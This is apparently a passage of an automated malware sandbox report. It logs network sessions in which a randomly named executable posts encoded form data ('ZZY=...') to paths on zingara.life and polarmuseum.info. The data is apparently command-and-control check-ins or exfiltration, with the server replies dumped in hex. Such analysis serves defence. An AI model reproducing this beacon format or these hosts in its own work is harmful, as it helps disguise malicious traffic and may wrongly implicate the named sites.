                                                                                                                set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:51 GMT; SameSite=Lax
                                                                                                                set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:51 GMT; SameSite=Lax
                                                                                                                set-cookie: _shopify_y=2a006b9e-2410-43a9-ad69-41888273dea8; Expires=Thu, 09-Oct-25 12:07:51 GMT; Domain=zingara.life; Path=/; SameSite=Lax
                                                                                                                set-cookie: _shopify_s=25a32db8-d952-465f-870e-9f90c6ffc1bd; Expires=Wed, 09-Oct-24
                                                                                                                Data Raw:
                                                                                                                Data Ascii:
                                                                                                                Oct 9, 2024 14:07:51.686234951 CEST1236INData Raw: 31 32 3a 33 37 3a 35 31 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 69 6e 67 61 72 61 2e 6c 69 66 65 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 66 65 31 61 66 65 62 39 2d 33 33
                                                                                                                Data Ascii: 12:37:51 GMT; Domain=zingara.life; Path=/; SameSite=Laxx-request-id: fe1afeb9-33ca-4dfd-9b8f-b9d803a34723-1728475671server-timing: processing;dur=236content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%
                                                                                                                Oct 9, 2024 14:07:51.686248064 CEST1236INData Raw: 61 74 69 6f 6e 3b 64 75 72 3d 33 30 32 2e 39 39 39 39 37 33 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 66 65 34 30 62 30 37 63 35 37 37 63 37 63 2d 45 57 52 0d 0a 0d 0a 36 37 39 0d 0a 1f 8b 08
                                                                                                                Data Ascii: ation;dur=302.999973Server: cloudflareCF-RAY: 8cfe40b07c577c7c-EWR679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@K
                                                                                                                Oct 9, 2024 14:07:51.686259985 CEST507INData Raw: f3 15 b9 a5 e2 6b 6a 63 1c 0d 5a 93 24 f9 aa d2 93 5a 22 1a 08 c6 03 9e 9c dc 48 d3 41 de 5d 30 3f 54 a4 a5 c6 b0 bb 41 b4 e1 cc 5b 22 2b 04 e1 7c 1b a5 fe 6c 89 dd d0 4f 96 31 ba 8c 16 7e 1c a5 ae 17 fa b3 c5 12 01 50 69 ba b0 bb 18 68 c2 b8 a7
                                                                                                                Data Ascii: kjcZ$Z"HA]0?TA["+|lO1~Pih.;/|ty@p7\!}lVWpuvxYc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^a


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                26192.168.2.74999823.227.38.74801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:53.343225956 CEST694OUTPOST /s7qk/ HTTP/1.1
                                                                                                                Host: www.zingara.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.zingara.life
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.zingara.life/s7qk/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 76 59 77 65 7a 49 6b 78 59 4b 68 50 75 74 48 30 6f 4a 65 68 53 73 36 7a 64 2f 78 50 63 49 4a 50 38 68 41 52 62 62 52 74 79 44 49 6f 4b 42 6e 4b 37 74 36 31 7a 51 66 67 59 38 44 30 49 72 38 59 47 4e 69 6a 4b 6f 35 41 76 43 6e 31 49 54 73 66 55 59 68 36 4f 53 38 75 38 37 30 79 41 62 77 4a 42 6c 70 72 43 6e 76 52 7a 54 44 51 4d 30 79 61 37 72 38 6c 6f 64 68 47 45 39 6b 79 57 6f 58 57 77 6e 63 53 67 52 6a 66 6d 78 65 50 55 42 77 2f 6a 69 73 71 52 43 66 65 6c 30 4a 72 52 78 6e 4a 73 36 32 49 63 6c 57 6a 31 53 57 4a 37 61 62 30 70 57 52 59 2f 33 51 68 48 68 50 2b 69 57 31 71 44 52 52 39 6b 49 73 4b 2b 66 7a 44 57 50 65 61 42 62 45 65 70 7a 4c 35 2f 33 78 6f 50 31 2b 51 77 46 2f 30 51 47 63 3d
                                                                                                                Data Ascii: ZZY=vYwezIkxYKhPutH0oJehSs6zd/xPcIJP8hARbbRtyDIoKBnK7t61zQfgY8D0Ir8YGNijKo5AvCn1ITsfUYh6OS8u870yAbwJBlprCnvRzTDQM0ya7r8lodhGE9kyWoXWwncSgRjfmxePUBw/jisqRCfel0JrRxnJs62IclWj1SWJ7ab0pWRY/3QhHhP+iW1qDRR9kIsK+fzDWPeaBbEepzL5/3xoP1+QwF/0QGc=
                                                                                                                Oct 9, 2024 14:07:54.257119894 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                Date: Wed, 09 Oct 2024 12:07:54 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                x-sorting-hat-podid: 156
                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                vary: Accept-Encoding,Accept
                                                                                                                x-frame-options: DENY
                                                                                                                x-shopid: 68129128605
                                                                                                                x-shardid: 156
                                                                                                                content-language: en-IN
                                                                                                                x-shopify-nginx-no-cookies: 0
                                                                                                                set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:53 GMT; SameSite=Lax
                                                                                                                set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:53 GMT; SameSite=Lax
                                                                                                                set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:54 GMT; SameSite=Lax
                                                                                                                set-cookie: _shopify_y=f1994b7a-4418-4777-9882-f971f0cbd2e4; Expires=Thu, 09-Oct-25 12:07:54 GMT; Domain=zingara.life; Path=/; SameSite=Lax
                                                                                                                set-cookie: _shopify_s=8e62383f-c62d-45d6-a9c4-12d0e528e322; Expires=Wed, 09-Oct-24
                                                                                                                Data Raw:
                                                                                                                Data Ascii:
                                                                                                                Oct 9, 2024 14:07:54.257144928 CEST1236INData Raw: 31 32 3a 33 37 3a 35 34 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 69 6e 67 61 72 61 2e 6c 69 66 65 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 65 34 31 37 66 34 35 37 2d 66 65
                                                                                                                Data Ascii: 12:37:54 GMT; Domain=zingara.life; Path=/; SameSite=Laxx-request-id: e417f457-fe2c-4d81-add5-90ac10630a20-1728475673server-timing: processing;dur=178content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%
                                                                                                                Oct 9, 2024 14:07:54.257155895 CEST1236INData Raw: 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 33 39 34 2e 30 30 30 30 35 33 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 66 65 34 30 63 31 30 63 38 63 34 32 65 38 2d 45 57 52 0d 0a 0d 0a 36 37 39 0d
                                                                                                                Data Ascii: tDuration;dur=394.000053Server: cloudflareCF-RAY: 8cfe40c10c8c42e8-EWR679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP
                                                                                                                Oct 9, 2024 14:07:54.257168055 CEST511INData Raw: b3 7d 7e 4f f3 15 b9 a5 e2 6b 6a 63 1c 0d 5a 93 24 f9 aa d2 93 5a 22 1a 08 c6 03 9e 9c dc 48 d3 41 de 5d 30 3f 54 a4 a5 c6 b0 bb 41 b4 e1 cc 5b 22 2b 04 e1 7c 1b a5 fe 6c 89 dd d0 4f 96 31 ba 8c 16 7e 1c a5 ae 17 fa b3 c5 12 01 50 69 ba b0 bb 18
                                                                                                                Data Ascii: }~OkjcZ$Z"HA]0?TA["+|lO1~Pih.;/|ty@p7\!}lVWpuvxYc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                27192.168.2.74999923.227.38.74801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:55.908375978 CEST1707OUTPOST /s7qk/ HTTP/1.1
                                                                                                                Host: www.zingara.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.zingara.life
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.zingara.life/s7qk/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 76 59 77 65 7a 49 6b 78 59 4b 68 50 75 74 48 30 6f 4a 65 68 53 73 36 7a 64 2f 78 50 63 49 4a 50 38 68 41 52 62 62 52 74 79 44 41 6f 4b 7a 76 4b 70 2b 53 31 79 51 66 67 51 63 43 7a 49 72 38 46 47 4e 71 6e 4b 6f 31 51 76 41 76 31 4a 77 6b 66 63 4e 4e 36 48 53 38 75 6a 4c 30 7a 66 4c 77 59 42 6c 34 73 43 6e 66 52 7a 54 44 51 4d 32 71 61 2f 2b 63 6c 6b 39 68 42 54 4e 6b 32 63 49 57 4c 77 6e 45 6f 67 52 33 6c 6d 43 57 50 55 68 67 2f 68 77 30 71 5a 43 66 63 6b 30 49 75 52 77 61 4c 73 36 43 4d 63 6c 69 46 31 56 36 4a 2b 64 69 67 38 31 56 4f 72 68 41 46 59 69 65 66 69 32 39 32 42 69 6c 39 69 36 38 77 77 2f 62 42 5a 4d 53 42 55 50 6c 35 38 43 62 37 31 7a 4a 75 66 54 62 4d 72 48 69 75 4d 43 66 2b 48 71 5a 46 7a 54 32 76 79 78 49 67 6e 53 6e 6b 30 6a 74 49 6c 50 32 78 6c 62 46 56 34 36 54 72 32 68 6d 61 41 34 36 43 49 50 77 49 4c 6b 4d 33 75 71 75 65 4c 63 75 30 70 4e 6f 6c 6b 76 6e 56 35 5a 53 54 53 70 44 74 61 62 6e 38 32 5a 72 6c 52 46 52 6e 64 6b 75 32 6b 76 30 6f 52 53 68 54 70 43 36 61 6e 68 [TRUNCATED]
                                                                                                                Data Ascii: ZZY=vYwezIkxYKhPutH0oJehSs6zd/xPcIJP8hARbbRtyDAoKzvKp+S1yQfgQcCzIr8FGNqnKo1QvAv1JwkfcNN6HS8ujL0zfLwYBl4sCnfRzTDQM2qa/+clk9hBTNk2cIWLwnEogR3lmCWPUhg/hw0qZCfck0IuRwaLs6CMcliF1V6J+dig81VOrhAFYiefi292Bil9i68ww/bBZMSBUPl58Cb71zJufTbMrHiuMCf+HqZFzT2vyxIgnSnk0jtIlP2xlbFV46Tr2hmaA46CIPwILkM3uqueLcu0pNolkvnV5ZSTSpDtabn82ZrlRFRndku2kv0oRShTpC6anh81tPpJQ8fgQOQ+cU7JcbX9FqvP3cLuPTjqRZ75ESlLSIlopdfJ4ksyCdPv8GzujX2jUM7zMM9V217y++jLrA/xHeRvvJGUq4jN4SQKGe+ywAhmyjRVRWTDR5rlXr+4F8hmljCrlpwi9WM1+K9pUdXno1wncFQchsrqRAOW5ueaxOCMnziputfUCc/Ee2IM2kfVcLlMUGKmJ+PVHv7LMOlNSy8ouIiGv+PHRxK5NSDsYI0tFE8Ga8JZbaafpnID3DfTtUQTq1oCR5Y7/M6SFYu7QWnfJxWzgYyi7pVOWaIkirXteUMR37UssziULMGdK5IXNRB5a6PrWsM+EvyLqE/yKjeHAFY1/1Ss61PQVe52eeSOaBYMJFapTzkUagRH9ObwHHWPia4tgy0yZcpKLB2/yaXU4G1N6LKZh4mR6krIU6akmgHRpyWg7Zq2NAnBnk0iVwr4s0Jx5cUrbHBc27ZW5cnNTcMgFy1hILo20/a6JsEFqqjV53CHbaE7k8cN2Du22spfTmdrLNgSMLy9cIZgzO1DUp50WWs4ke3Wfea/4DEGr05hRShg8j2XYxIhubjhvuh0W2WCr7rhtm+J7/stxxWTGU99WiKFBP0HSrm5VjTCGRRXlP0g99PtNdBIdCR7zNPS7JxLGYdly7VVZbecGMEi/zTNA6YO [TRUNCATED]
                                                                                                                Oct 9, 2024 14:07:56.496354103 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                Date: Wed, 09 Oct 2024 12:07:56 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                x-sorting-hat-podid: 156
                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                vary: Accept-Encoding,Accept
                                                                                                                x-frame-options: DENY
                                                                                                                x-shopid: 68129128605
                                                                                                                x-shardid: 156
                                                                                                                content-language: en-IN
                                                                                                                x-shopify-nginx-no-cookies: 0
                                                                                                                set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:56 GMT; SameSite=Lax
                                                                                                                set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:56 GMT; SameSite=Lax
                                                                                                                set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:56 GMT; SameSite=Lax
                                                                                                                set-cookie: _shopify_y=8a594a9b-e5d6-46f6-b3bc-dacfbc7bea45; Expires=Thu, 09-Oct-25 12:07:56 GMT; Domain=zingara.life; Path=/; SameSite=Lax
                                                                                                                set-cookie: _shopify_s=022fb35b-4924-43c4-88bf-911b01658e63; Expires=Wed, 09-Oct-24
                                                                                                                Data Raw:
                                                                                                                Data Ascii:
                                                                                                                Oct 9, 2024 14:07:56.496368885 CEST224INData Raw: 31 32 3a 33 37 3a 35 36 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 69 6e 67 61 72 61 2e 6c 69 66 65 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 34 65 63 31 38 66 33 66 2d 63 39
                                                                                                                Data Ascii: 12:37:56 GMT; Domain=zingara.life; Path=/; SameSite=Laxx-request-id: 4ec18f3f-c937-4051-bac3-b32bb25861a0-1728475676server-timing: processing;dur=93content-security-policy: frame-ancestors 'none'; report-uri /csp-repor
                                                                                                                Oct 9, 2024 14:07:56.496901035 CEST1236INData Raw: 74 3f 73 6f 75 72 63 65 25 35 42 61 63 74 69 6f 6e 25 35 44 3d 6e 6f 74 5f 66 6f 75 6e 64 26 73 6f 75 72 63 65 25 35 42 61 70 70 25 35 44 3d 53 68 6f 70 69 66 79 26 73 6f 75 72 63 65 25 35 42 63 6f 6e 74 72 6f 6c 6c 65 72 25 35 44 3d 73 74 6f 72
                                                                                                                Data Ascii: t?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=4ec18f3f-c937-4051-bac3-b32bb25861a0-1728475676x-content-type-options: nosniffx-downloa
                                                                                                                Oct 9, 2024 14:07:56.496913910 CEST1236INData Raw: 0e 2a 78 23 69 03 72 1a 7a 50 fb 40 4b ea e4 6d 4d 91 bc 6d 81 56 d2 1b 19 14 5d 07 3a 40 0a 42 3f a1 cf 68 cd 45 49 45 16 3e 43 3b 22 b6 ac 51 ab 96 94 25 6b b6 6a e9 ed f8 27 6f cd 6f bc 8e 7d 52 47 86 5c 9d c0 dd 91 ae af 99 7c e8 fa 01 ae 2f
                                                                                                                Data Ascii: *x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]L(V2ggNzcmJ SE^Fjuy4(!8&V(pPzv&i~fkPK5y~8.I,UV(U<Rmt#OaA!
                                                                                                                Oct 9, 2024 14:07:56.496925116 CEST278INData Raw: 0c 73 20 d5 72 f4 e2 d2 8a d7 bb 5e b1 61 b0 56 18 24 de a8 fa 02 2f 4d cd 59 14 fe b7 73 ca 70 8c ae e0 63 31 41 76 00 72 e5 58 99 5f 45 b6 20 ad 05 d6 d2 7d 17 e0 79 b0 3d 17 89 b3 c7 67 0e ef 1d c1 e3 72 98 48 cc 03 36 56 90 b7 b6 75 0f 8f a9
                                                                                                                Data Ascii: s r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVtsB@oCZ3T=EanM+H~C%m>]U||$2X'Um*A#YQz`|~m4c


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                28192.168.2.75000023.227.38.74801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:07:58.448271036 CEST415OUTGET /s7qk/?ZZY=iaY+w4IpIrYSidyoirH4HJSkbusQX4NI5gNJJ4lc6xQkeif0pMuzzCPjcczGW/AsONaxEKF5w0HAACs6c94+MzxqwLAwe70WCnJ+QkbRlWeyUQ/E8YwpuoNtXuk6ep3axG9muxvIvCTd&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.zingara.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Oct 9, 2024 14:07:58.956057072 CEST1236INHTTP/1.1 301 Moved Permanently
                                                                                                                Date: Wed, 09 Oct 2024 12:07:58 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                x-sorting-hat-podid: 156
                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                x-storefront-renderer-rendered: 1
                                                                                                                location: https://zingara.life/s7qk?ZZY=iaY+w4IpIrYSidyoirH4HJSkbusQX4NI5gNJJ4lc6xQkeif0pMuzzCPjcczGW/AsONaxEKF5w0HAACs6c94+MzxqwLAwe70WCnJ+QkbRlWeyUQ/E8YwpuoNtXuk6ep3axG9muxvIvCTd&mHm0o=rrqhoH
                                                                                                                x-redirect-reason: https_required
                                                                                                                x-frame-options: DENY
                                                                                                                content-security-policy: frame-ancestors 'none';
                                                                                                                x-shopid: 68129128605
                                                                                                                x-shardid: 156
                                                                                                                vary: Accept
                                                                                                                powered-by: Shopify
                                                                                                                server-timing: processing;dur=14, db;dur=4, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="xt5b", requestID;desc="946ff833-0065-4ef3-b0b4-521e662fc7a4-1728475678"
                                                                                                                x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                                                                                                x-request-id: 946ff833-0065-4ef3-b0b4-521e662fc7a4-1728475678
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0CLDKfmr7owkWkUzClp2GRwMbnlDrC3R08nezv2g8RcKzp82hF0ivLAJaXcF2RuQk6DLGT3zHxNVCWRlJX2q6yiVrJ4aEzcHTE71Te615BIalhdy%2BFFiCb%2B8E3JQuFef%2Fo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_f
                                                                                                                Data Raw:
                                                                                                                Data Ascii:
                                                                                                                Oct 9, 2024 14:07:58.956235886 CEST288INData Raw: 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74
                                                                                                                Data Ascii: action":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=63.000202X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer:


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                29192.168.2.750001199.59.243.227801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:08:04.100651979 CEST686OUTPOST /reui/ HTTP/1.1
                                                                                                                Host: www.polarmuseum.info
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.polarmuseum.info
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.polarmuseum.info/reui/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 78 34 2b 31 43 59 36 6f 4d 33 30 55 57 32 47 69 2f 30 46 78 45 33 74 4f 62 79 41 65 50 50 61 62 4d 58 34 68 32 78 74 7a 6c 33 4e 5a 6d 35 67 70 34 70 4e 4f 6e 58 76 65 48 4c 49 61 52 59 39 78 48 37 57 63 53 35 36 33 6c 55 73 69 73 64 65 68 6a 76 72 38 77 51 48 4a 6e 76 35 70 68 5a 45 4a 5a 4c 33 31 42 65 69 66 30 4e 51 38 6f 49 79 42 54 59 4f 30 48 55 4d 4a 6e 75 48 46 79 69 6e 59 35 64 6b 57 44 44 64 36 53 4f 61 59 62 41 65 63 61 58 46 78 2b 5a 4a 66 43 4c 70 48 6a 37 2b 54 4b 46 45 61 4b 55 46 7a 4b 2b 50 6c 57 63 48 5a 69 66 71 45 68 49 32 69 30 37 59 4e 69 33 54 6a 6e 59 4a 33 59 63 74 33 6a 69 71 58 73 42 36 62 72 41 3d 3d
                                                                                                                Data Ascii: ZZY=x4+1CY6oM30UW2Gi/0FxE3tObyAePPabMX4h2xtzl3NZm5gp4pNOnXveHLIaRY9xH7WcS563lUsisdehjvr8wQHJnv5phZEJZL31Beif0NQ8oIyBTYO0HUMJnuHFyinY5dkWDDd6SOaYbAecaXFx+ZJfCLpHj7+TKFEaKUFzK+PlWcHZifqEhI2i07YNi3TjnYJ3Yct3jiqXsB6brA==
                                                                                                                Oct 9, 2024 14:08:04.533595085 CEST1236INHTTP/1.1 200 OK
                                                                                                                date: Wed, 09 Oct 2024 12:08:03 GMT
                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                content-length: 1130
                                                                                                                x-request-id: 6f9baea8-3bcd-4940-803d-dbb825dc1b33
                                                                                                                cache-control: no-store, max-age=0
                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tq8xQMAQYvNPuQMiwP0UQ1XJeFafJuZyB/+hm7Wp5AtZezX+6pwzPoy0wQqcChM9ogdaLCHbtxKVuAjbtGAGGA==
                                                                                                                set-cookie: parking_session=6f9baea8-3bcd-4940-803d-dbb825dc1b33; expires=Wed, 09 Oct 2024 12:23:04 GMT; path=/
                                                                                                                connection: close
                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 71 38 78 51 4d 41 51 59 76 4e 50 75 51 4d 69 77 50 30 55 51 31 58 4a 65 46 61 66 4a 75 5a 79 42 2f 2b 68 6d 37 57 70 35 41 74 5a 65 7a 58 2b 36 70 77 7a 50 6f 79 30 77 51 71 63 43 68 4d 39 6f 67 64 61 4c 43 48 62 74 78 4b 56 75 41 6a 62 74 47 41 47 47 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tq8xQMAQYvNPuQMiwP0UQ1XJeFafJuZyB/+hm7Wp5AtZezX+6pwzPoy0wQqcChM9ogdaLCHbtxKVuAjbtGAGGA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                Oct 9, 2024 14:08:04.533689976 CEST583INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmY5YmFlYTgtM2JjZC00OTQwLTgwM2QtZGJiODI1ZGMxYjMzIiwicGFnZV90aW1lIjoxNzI4NDc1Nj


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
